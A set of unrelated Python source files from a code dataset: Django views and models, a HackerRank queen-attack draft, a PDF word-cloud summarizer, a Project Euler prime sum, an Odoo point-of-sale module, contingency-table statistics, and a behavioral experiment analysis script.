base implementation first to get a context\n# context = super(UserList, self).get_context_data(**kwargs)\n# # Get the blog from id and add it to the context\n# context['some_data'] = 'This is just some data'\n# return context\n\ndef index(request):\n homepage = Employees.objects.all()\n return render(request, 'index.html', {'homepage': homepage})\n\n# Add the two views we have been talking about all this time :)\n#class HomePageView(TemplateView):\n# template_name = \"home.html\"\n\n\n\nclass UserCreateView(generic.CreateView):\n from_class = UserCreationForm\n model = User\n template_name = 'createuser.html'\n# def __init__(self, arg):\n# super(UserCreateView, self).__init__()\n# self.arg = arg\n\n\nclass AboutPageView(TemplateView):\n template_name = \"about.html\"\n\n# Add this view\nclass DataPageView(TemplateView):\n def get(self, request, **kwargs):\n # we will pass this context object into the\n # template so that we can access the data\n # list in the template\n context = {\n 'data': [\n {\n 'name': 'Celeb 1',\n 'worth': '3567892'\n },\n {\n 'name': 'Celeb 2',\n 'worth': '23000000'\n },\n {\n 'name': 'Celeb 3',\n 'worth': '1000007'\n },\n {\n 'name': 'Celeb 4',\n 'worth': '456789'\n },\n {\n 'name': 'Celeb 5',\n 'worth': '7890000'\n },\n {\n 'name': 'Celeb 6',\n 'worth': '12000456'\n },\n {\n 'name': 'Celeb 7',\n 'worth': '896000'\n },\n {\n 'name': 'Celeb 8',\n 'worth': '670000'\n }\n ]\n }\n\n return render(request, 'data.html', context)\n","sub_path":"old_skillset/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"365082858","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport time\n\n#n 5 x 5 board size\n#k 3 num of obstacles\n#r_q 4 row of queen\n#c_q 3 col of queen\n#obstacles array of obs r,c\n# 5 3 4 3 [[5, 5], [4, 2], [2, 3]]\n\n\n# 3,3 [4,3],[4,4],[3,4],[2,4],[2,3],[2,2],[3,2],[4,2]\n\n\n\n# Complete the queensAttack function below.\ndef queensAttack(n, k, r_q, c_q, obstacles):\n r = r_q\n c = c_q\n m = r_q - c_q\n mp = r_q + c_q\n move_count = 0\n obs = []\n #get nearest obstacles\n for x in range(k):\n if obstacles[x][0] == r_q or obstacles[x][1] == c_q 
or obstacles[x][0] - obstacles[x][1] == m or obstacles[x][0] + obstacles[x][1] == mp:\n obs.append(obstacles[x])\n print(obs)\n\n\n # print(obstacles[x][0])\n # if obstacles[x]\n\n # all_moves = []\n # for x in range(n):\n # coords_to_add = [[r+1+x,c],[r-1-x,c],[r+1+x,c+1+x],[r+x,c-1+x],[r+x,c+1+x],[r-1+x,c-1+x],[r-1+x,c],[r-1,c+1]]\n # print(coords_to_add)\n \n\n \n\n\n\n\nstart_time = time.time()\nqueensAttack(8,7,3,5,[[3,1], [3,7], [6,5], [5,3], [5,7], [2,4], [1,7]])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"hr_queen_attack_3.py","file_name":"hr_queen_attack_3.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513578090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 08 22:56:35 2018\r\n\r\n@author: matth\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport textract\r\n#from difflib import get_close_matches, SequenceMatcher\r\n#from collections import Counter\r\n#import re\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\nimport gensim.summarization.summarizer as summ\r\nimport json\r\n\r\n#def count_close_matches(word,list_text,cutoff):\r\n# out = get_close_matches(word,list_text,1000,cutoff)\r\n# return len(out)\r\n\r\nfiles = os.listdir(\"../\")\r\n\r\nn_files = np.size(files)\r\nn = 337\r\nwhile n < n_files:\r\n \"\"\"n_files:\"\"\"\r\n \"\"\"if file[n][-3:-1]\"\"\"\r\n if files[n][-4:] == \".pdf\":\r\n print(\"\\nReadingFile: \"+files[n]+\" (\"+str(n+1)+\" of \"+str(n_files)+\")\")\r\n text = textract.process(\"../\"+files[n],\\\r\n method='tesseract',\\\r\n language='eng',\\\r\n )\r\n d_text = text.decode(\"UTF-8\",\"replace\")\r\n# l_text_1 = re.findall(r\"[\\w']+\",d_text)\r\n# l_text_2 = d_text.replace(\"\\n\",\" \")\r\n# l_text_2.replace(\".\",\" \")\r\n# l_text_2.replace(\"?\",\" \")\r\n# l_text_2 = d_text.split(\" \")\r\n# ll_text_1 = [text.lower() for text in l_text_1]\r\n# ll_text_2 = [text.lower() for text in l_text_2]\r\n \r\n wordcloud_1 = WordCloud(collocations=False,regexp=r\"\\w[\\w'-]+|[0-9]+\\s[\\w]+\").generate(d_text)\r\n file = open(\"./\"+files[n][0:-4]+\"_keywords.txt\",'w')\r\n file.write(json.dumps(wordcloud_1.words_).replace(\" \",\"\\n\"))\r\n file.close()\r\n \r\n# wordcloud_2 = WordCloud.generate(ll_text_2)\r\n \r\n fig1 = plt.figure()\r\n plt.imshow(wordcloud_1,interpolation='bilinear')\r\n plt.axis(\"off\")\r\n plt.show()\r\n fig1.savefig(\"./\"+files[n][0:-4])\r\n \r\n \r\n ss = summ.summarize(d_text,ratio=0.2)\r\n file = open(\"./\"+files[n][0 :-3]+\"txt\",'w')\r\n file.write(ss)\r\n file.close()\r\n# plt.figure()\r\n# plt.imshow(wordcloud_2,interpolation='bilinear')\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(type(d_text))\r\n# keywords = [\"nanomaterials\",\"biomedical\",\"spectrum\",\"x-ray\",\"gamma\",\\\r\n# \"radiation\",\"semiconductor\",\"quantum\",\"reconstruction\",\\\r\n# \"geometry\",\"spectral\",\"optogenetics\",\"erg\",\"ecog\",\"photon\",\\\r\n# \"patch-clamp\",\"electrophysiology\",\"electroretinography\",\\\r\n# \"imaging\",\"therapy\",\"diagnostic\",\"theranostic\",\"protein\",\\\r\n# \"delivery\",\"nanoparticle\",\"upconversion\",\"fluorescence\",\\\r\n# \"light\",\"visible\",\"k-edge\",\"absorption\",\"antioxidant\",\\\r\n# \"oxidative\",\"stress\",\"g-protein\",\"gpcr\",\"opsin\",\\\r\n# \"rhodopsin\",\"genetics\",\"energy\",\"scatter\",\"pulse\",\"dose\",\\\r\n# \"rf\",\"infrared\",\"nir\",\"electronics\",\"pulse-train\",\\\r\n# 
\"waveform\",\"electricity\",\"electron\",\"neural\",\"network\",\\\r\n# \"lightning\",\"radon\",\"particle\",\"wave\",\"microscopy\",\"field\",\\\r\n# \"mutation\",\"single-strand\",\"double-strand\",\"free\",\"radical\",\\\r\n# \"magnetic\",\"mri\",\"dti\",\"fmri\",\"detector\",\"ccd\",\"emccd\",\\\r\n# \"pmt\",\"uv\",\"ultraviolet\",\"dna\",\"eye\",\"retina\",\"genomics\",\\\r\n# \"proteomics\",\"scatter\",\"water\",\"fungi\",\"tissue\",\"single-cell\",\\\r\n# \"cell\",\"review\",\"abstract\",\"methods\",\"results\",\"conclusions\",\\\r\n# \"discussion\",\"cancer\",\"statistics\",\"machine-learning\",\\\r\n# \"aperture\",\"grating\",\"interferometry\",\"response\",\"a-wave\",\\\r\n# \"b-wave\",\"frequency\",\"damage\"]\r\n# l_m = 0\r\n# for word in keywords:\r\n# if len(word) > l_m:\r\n# l_m = len(word)\r\n# \r\n# \r\n# offset = l_m + 4\r\n# \r\n# for word in keywords:\r\n# num = count_close_matches(word,ll_text_2,0.85)\r\n# print(\"Instances of \"+word+\":\"+\" \"*(offset-len(word))+str(num))\r\n# \r\n# counts = Counter(l_text_l)\r\n# print(counts)\r\n \r\n n += 1\r\n \r\n","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328921843","text":"# jacob clarkson\n# project euler problem 10\n# january 2015\n\n# program to find the sum of all the prime numbers below 2 million\n\nimport math\n\n# method to check if a number is a prime number (reasonably efficient trial division method)\ndef isPrime(x):\n\tfor i in range (3, int(math.sqrt(x) + 1)):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\nsum = 2\nfor x in range (2, 2000000):\n\tif x%2 != 0:\n\t\tif isPrime(x) == True:\n\t\t\tsum += x\n\nprint (sum)","sub_path":"Prob10.py","file_name":"Prob10.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"639344885","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2013 BroadTech IT Solutions.\n# (http://wwww.broadtech-innovations.com)\n# contact@boradtech-innovations.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields\n\nfrom psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED\nimport time\n\nclass pos_order(models.Model):\n _inherit = 'pos.order'\n \n return_order = fields.Boolean('Returned', readonly=True, help='To identify the order is returned or not!')\n \n def create(self, cr, user, vals, context=None):\n for val in vals.get('lines'):\n for key in val:\n if isinstance(key, dict):\n order_id = key.get('order_id')\n if order_id:\n refund_reference = self.browse(cr, user, order_id, context).pos_reference\n if refund_reference:\n vals.update({'pos_reference': 'Refund'+' '+refund_reference,\n 'return_order': True})\n cr._cnx.set_isolation_level(ISOLATION_LEVEL_READ_COMMITTED)\n return super(pos_order, self).create(cr, user, vals, context)\n \n def _order_fields(self, cr, uid, ui_order, context=None):\n fields = {\n 'name': ui_order['name'],\n 'user_id': ui_order['user_id'] or False,\n 'session_id': ui_order['pos_session_id'],\n 'lines': ui_order['lines'],\n 'pos_reference':ui_order['name'],\n 'partner_id': ui_order['partner_id'] or False,\n }\n if ui_order['return_status'] == 'active':\n fields.update({'return_order': ui_order['return_order']})\n return fields\n \n def create_from_ui(self, cr, uid, orders, context=None):\n # Keep only new orders\n submitted_references = [o['data']['name'] for o in orders]\n existing_order_ids = self.search(cr, uid, [('pos_reference', 'in', submitted_references)], context=context)\n existing_orders = self.read(cr, uid, existing_order_ids, ['pos_reference'], context=context)\n existing_references = set([o['pos_reference'] for o in existing_orders])\n orders_to_save = [o for o in orders if o['data']['name'] not in existing_references]\n\n order_ids = []\n\n for tmp_order in orders_to_save:\n to_invoice = tmp_order['to_invoice']\n order = tmp_order['data']\n if order['return_status'] == 'active':\n order.update({'return_order': True})\n order_id = self._process_order(cr, uid, order, context=context)\n order_ids.append(order_id)\n\n try:\n self.signal_workflow(cr, uid, [order_id], 'paid')\n except Exception as e:\n _logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n if to_invoice:\n self.action_invoice(cr, uid, [order_id], context)\n order_obj = self.browse(cr, uid, order_id, context)\n self.pool['account.invoice'].signal_workflow(cr, uid, [order_obj.invoice_id.id], 'invoice_open')\n\n return order_ids\n \npos_order()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"humanytek_pos/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353198543","text":"#!/usr/bin/python\n# coding: latin-1\nimport numpy as np\nimport scipy.stats.distributions as distributions\n\n\"\"\"\n CONTINGENCY TABLE ANALYSIS (CTA)\n\n Test of the association between em2D and RMSD using CTA (Num. Rec. 2007, sec. 14.4)\n\"\"\"\n\n\ndef cta_chi_square(X,Y,bins):\n \"\"\"\n Contingency Table Analysis\n Measure of the association of variables X and Y with the chi-square\n statistic. Num. Rec. 
14.4.1\n bins - the number of bins to form for the association test\n output - The p-value of the chi-square test\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n X2 = 0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n # print \"i,j\",i,j\n if(Nx[i] == 0 or Ny[j] == 0):\n continue # ignore empty bins\n nij = 1.0* Nx[i] * Ny[j] / N\n X2 += 1.0 * ( (CT[i][j] - nij)**2 ) / nij\n deg = bins*bins-bins-bins+1 # Degrees of freedom\n chi2 = distributions.chi2\n Q = 1-chi2.cdf(X2, deg)\n return Q\n\n\ndef mutual_information(X, Y, bins):\n \"\"\"\n Mutual information between X and Y sets of values. The values are\n tabulated in a table of bins x bins size.\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n # Mutual information\n I = 0\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n I += pij * np.log(pij/ (Px[i] * Py[j]) )\n return I\n \ndef uncertainty_coefficient(X, Y, bins):\n \"\"\"\n Uncertainty coefficient of Y respect to X\n 0 - no relationship\n 1 - perfect relationship\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n I = mutual_information(X, Y, bins)\n # entropy of Y given X\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n Hyx =0.0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n Hyx += pij * np.log(pij/Px[i] )\n Hyx = -1 * Hyx \n # entropy of Y \n Hy = (-1.) 
* np.sum([p*np.log(p) for p in Py if p> epsilon]) \n return (Hy-Hyx)/Hy\n \n","sub_path":"math/mutual_information.py","file_name":"mutual_information.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18071867","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.db import models\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom django.contrib.contenttypes import generic\r\nfrom django.contrib.contenttypes.models import ContentType\r\n\r\nclass Seo(models.Model):\r\n class Meta:\r\n verbose_name = _('SEO fields')\r\n verbose_name_plural = _('SEO fields')\r\n unique_together = ((\"content_type\", \"object_id\"),)\r\n\r\n title = models.CharField(verbose_name=_('Title'),\r\n max_length=200, default='', blank=True)\r\n description = models.CharField(verbose_name=_('Description'),\r\n max_length=200, default='', blank=True)\r\n keywords = models.CharField(verbose_name=_('Keywords'),\r\n max_length=1000, default='', blank=True)\r\n\r\n content_type = models.ForeignKey(ContentType)\r\n object_id = models.PositiveIntegerField()\r\n content_object = generic.GenericForeignKey('content_type', 'object_id')\r\n\r\n def __unicode__(self):\r\n return self.title\r\n\r\nclass Url(models.Model):\r\n class Meta:\r\n verbose_name = _('URL')\r\n verbose_name_plural = _('URLs')\r\n\r\n url = models.CharField(verbose_name=_('URL'),\r\n max_length=200, default='/', unique=True,\r\n help_text=_(\"This should be an absolute path, excluding the domain name. Example: '/events/search/'.\"))\r\n\r\n def get_absolute_url(self):\r\n return self.url\r\n\r\n def __unicode__(self):\r\n return self.url\r\n","sub_path":"virtual/lib/python3.6/site-packages/seo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532424213","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nimport pickle\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport scipy\n\n\n# Suppress runtimewarning due to pandas bug\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n# *********************************************\n# Set up defaults\n# *********************************************\nplot = False\nsave = False\nprint_diagnoistic = True\n\n# *********************************************\n# Load Data\n# ********************************************\ndata_dir = os.path.expanduser('~')\nbias2_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias2_parameter_fits.pkl', 'rb'))\nbias1_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias1_parameter_fits.pkl', 'rb'))\neoptimal_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/eoptimal_parameter_fits.pkl', 'rb'))\nignore_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/ignore_parameter_fits.pkl', 'rb'))\nmidline_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/midline_parameter_fits.pkl', 'rb'))\nswitch_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/switch_parameter_fits.pkl', 'rb'))\nmemory_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/memory_parameter_fits.pkl', 'rb'))\nperseverance_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/perseverance_parameter_fits.pkl', 'rb'))\npermem_fit_dict = 
pickle.load(open('../../Analysis/Analysis_Output/permem_parameter_fits.pkl', 'rb'))\n\ngtrain_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_df.pkl')\ngtrain_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_learn_df.pkl')\ngtest_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_learn_df.pkl')\ngtest_conform_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_conform_df.pkl')\ngtest_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_df.pkl')\ngtrain_learn_df.id = gtrain_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\ngtest_learn_df.id = gtest_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\n\n\n# *********************************************\n# Select Dataset\n# ********************************************* \nmodel = 'TS'\ndf = gtest_df.copy()\nif 'midline_posterior' in df.columns:\n df.drop(['midline_posterior','midline_posterior_cross'], axis = 1, inplace = True)\n\n# *********************************************\n# Additional Variables\n# ********************************************* \nfor models in ['bias2','bias1','eoptimal', 'ignore', 'switch','memory','perseverance','permem']:\n df[models + '_choice'] = (df[models + '_posterior']>.5).astype(int)\n df[models + '_certainty'] = (abs(df[models + '_posterior']-.5))/.5\n\nswitch_sums = []\ntrials_since_switch = 0\nfor i,row in df.iterrows():\n if row['switch'] == 1 or pd.isnull(row['switch']):\n trials_since_switch = 0\n else:\n trials_since_switch += 1\n switch_sums.append(trials_since_switch)\ndf['trials_since_switch'] = switch_sums\n\n\n# *********************************************\n# Selection Criterion\n# ********************************************* \n## Exclude subjects based on behavioral criteria\nselect_ids = gtest_df.groupby('id').mean().stim_conform>.75\nselect_ids = list(select_ids[select_ids].index)\nutter_failures = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n\n\ngroup_means = df.groupby('id')['correct'].mean() \nk = range(1,10)\nk_error = []\nfor k_i in k: \n c,label = scipy.cluster.vq.kmeans2(group_means,k_i)\n k_error.append(np.sum(np.power([c[i] for i in label]-group_means,2)))\n\n#exclude subjects based on percent correct\nx = df.groupby('id')['correct'].mean() \nc,label = scipy.cluster.vq.kmeans2(group_means,np.array([.49,.51]))\n\n\n\n# *********************************************\n# Model Comparison\n# ********************************************* \ncompare_df = df\ncompare_df_subset = compare_df.filter(regex = 'subj_ts|.*posterior_cross$')\nmodel_subj_compare = compare_df_subset.corr()\n\nlog_posteriors = pd.DataFrame()\nfor model in compare_df_subset.columns[1:]:\n log_posteriors[model] = np.log(abs(compare_df_subset.subj_ts-(1-compare_df_subset[model])))\n\n\ncompare_df = pd.concat([compare_df[['id','subj_ts','context']], log_posteriors], axis = 1)\ncompare_df['random_log'] = np.log(.5)\n\nsummary = compare_df.groupby('id').sum().drop(['context','subj_ts'],axis = 1)\n\nnum_params = [3,2,1,1,3,3,4,1,0]\nparam_cost_df = np.log(df.groupby('id').count()).iloc[:,0:len(summary.columns)]*num_params\nparam_cost_df.columns = summary.columns\nBIC_summary = -2*summary + param_cost_df\n\n#extract column of best model\nmin_col = BIC_summary.idxmin(1)\nbest_models = min_col.map(lambda x: x[:x.find('_')])\nbayes_models = [i in ['bias2', 'bias1', 'ignore', 'eoptimal'] for i in best_models]\nmem_models = [i in ['memory', 'perseverance','permem'] for i in best_models]\n\nbest_posterior = []\nfor i in 
range(len(best_models)):\n subj_id = best_models.index[i]\n model = best_models[i]\n subj_df = df.query('id == \"%s\"' % subj_id)\n if model == 'random':\n best_posterior += [.5]*len(subj_df)\n else:\n best_posterior += list(subj_df[model + '_posterior'])\n \ndf['best_posterior'] = best_posterior\ndf['best_choice'] = (df['best_posterior']>.5).astype(int)\ndf['best_certainty'] = (abs(df['best_posterior']-.5))/.5\n\nall_df = df.copy()\nids = np.unique(df['id'])\nselect_ids = list(ids[label==1])\ndf_nonlearners = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n# *********************************************\n# Behavioral Analysis\n# ********************************************* \n#train analysis\ngtrain_df.loc[:,'last_FB'] = gtrain_df['FB'].shift()\ngtrain_df.loc[:,'last_choice'] = gtrain_df['subj_ts'].shift()\ngtrain_df.loc[df.index == 0,['last_FB','last_choice']] = np.nan\n\nparams = []\npvals = []\nformula = 'subj_ts ~ context + last_choice * last_FB'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = gtrain_df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n params.append(res.params[1:]) \n pvals.append(res.pvalues[1:])\n\n\n#effect of last TS\ndf[['last_TS', 'bias2_last_choice']] = df[['subj_ts', 'bias2_choice']].shift(1)\ndf.loc[0,['last_TS','bias2_last_choice']]=np.nan\nformula = 'subj_ts ~ context'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\n\n\nlearner_params = []\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n learner_params.append(res.params[1:])\nlearner_params = pd.DataFrame(learner_params).mean()\n\nselect_ids = abs(df_nonlearners.groupby('id').subj_ts.mean()-.5)<.475\nselect_ids = list(select_ids[select_ids].index)\ndf_fail = df_nonlearners.query('id in %s' % select_ids)\nnonlearner_params = []\nfor i in np.unique(df_fail['id']):\n res = smf.glm(formula = formula, data = df_fail.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n nonlearner_params.append(res.params[1:])\nnonlearner_params = pd.DataFrame(nonlearner_params).mean()\n\n# *********************************************\n# Print Diagnostics\n# *********************************************\n\nif print_diagnoistic == True:\n for i in all_df.id.unique():\n id_df = all_df[all_df['id'] == i]\n if i in df.id.unique():\n print(i, 'learner, best: ', best_models.loc[i])\n else:\n print(i, 'nonlearner, best: ', best_models.loc[i])\n print('Pereseverance:', np.corrcoef(id_df.subj_ts,id_df.perseverance_choice)[1,0]) \n print('bias2:', np.corrcoef(id_df.subj_ts,id_df.bias2_choice)[1,0])\n print('bias1:', np.corrcoef(id_df.subj_ts,id_df.bias1_choice)[1,0]) \n print('')\n\n\n# *********************************************\n# Plotting\n# *********************************************\n\nif plot == True:\n contexts = np.unique(gtest_df.context)\n figdims = (16,12)\n fontsize = 20\n \n # ***************************\n # Plots for Learners - only using bayesian models\n # ***************************\n plot_df = df.copy()\n plot_df['rt'] = plot_df['rt']*1000\n plot_ids = np.unique(plot_df.id)\n \n # Plot task-set count by context value\n sns.set_style(\"darkgrid\", {\"axes.linewidth\": \"1.25\", \"axes.edgecolor\": \".15\"})\n p1 = plt.figure(figsize = figdims)\n plt.hold(True) \n 
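    # Added note: plt.hold(True) was deprecated in matplotlib 2.0 and removed in 3.0;
    # on a modern matplotlib the repeated plt.plot calls below already draw onto the
    # same axes, so these hold() calls can simply be dropped.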
plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').bias2_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', label = 'bias-2 observer')\n plt.plot(plot_df.groupby('context').bias1_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = 'bias-1 observer')\n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n for subj in plot_ids:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n if subj_df.correct.mean() < .55:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'r', alpha = .2)\n else:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'k', alpha = .2)\n a = plt.axes([.62, .15, .3, .3])\n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').eoptimal_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = r'$\\epsilon$-optimal observer')\n plt.tick_params(\n axis = 'both',\n which = 'both',\n labelleft = 'off',\n labelbottom = 'off')\n pylab.legend(loc='upper left',prop={'size':14})\n \n\n # Plot task-set count by context value\n range_start = 0\n range_length = 7\n p2 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = 'subject')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = '_nolegend_')\n plt.gca().set_color_cycle(None)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = 'bias-2 observer')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = '_nolegend_')\n pylab.legend(loc='best',prop={'size':20})\n\n \n # Plot rt against bias2 model posterior\n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[4]) \n p3 = sns.lmplot(x='bias2_posterior',y='rt', hue = 'id', data = subj_df, order = 2, size = 6, col = 'id')\n p3.set_xlabels(\"P(TS2)\", size = fontsize)\n p3.set_ylabels('Reaction time (ms)', size = fontsize)\n p3.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n # Plot rt against bias2 model certainty\n # Take out RT < 100 ms \n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[3]) \n p4 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', col = 'id', size = 6, data = subj_df) \n p4.set_xlabels(\"Model Confidence\", size = fontsize)\n p4.set_ylabels('Reaction time (ms)', size = fontsize)\n p4.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n p5 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', ci = None, legend = False, size = figdims[1], data = plot_df.query('rt>100')) \n plt.xlim(-.1,1.1)\n p5.set_xlabels(\"Model Confidence\", size = fontsize)\n p5.set_ylabels('Reaction time (ms)', size = 
fontsize)\n \n \n # plot bias2 parameters\n params_df = pd.DataFrame()\n params_df['id'] = [x[1:3] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['learner'] = [x[0:3] in plot_ids for x in bias2_fit_dict if ('_fullRun' in x)] \n params_df['r1'] = [bias2_fit_dict[x]['r1'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['r2'] = [bias2_fit_dict[x]['r2'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['eps'] = [bias2_fit_dict[x]['TS_eps'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df = pd.melt(params_df, id_vars = ['id','learner'], value_vars = ['eps','r1','r2'], var_name = 'param', value_name = 'val')\n\n p6 = plt.figure(figsize = figdims)\n ax = plt.subplot(111)\n box_palette = sns.color_palette(['m','c'], desat = 1)\n sns.boxplot(x = 'param', y = 'val', hue = 'learner', hue_order = [1,0], data = params_df, palette = box_palette)\n plt.xlabel(\"Parameter\", size = fontsize)\n plt.ylabel('Value', size = fontsize)\n plt.title('Bias-2 Model Parameter Fits', size = fontsize+4, y = 1.05)\n plt.xticks([0,1,2], ('$\\epsilon$','$r_1$','$r_2$'), size = fontsize)\n ax.legend(ax.get_legend_handles_labels()[0],['Learners','Non-learners'], loc = 'upper left')\n \n \n\n #look at models\n p7 = plt.figure(figsize = figdims)\n plt.hold(True)\n for c in log_posteriors.columns[:-1]:\n sns.kdeplot(summary[c])\n 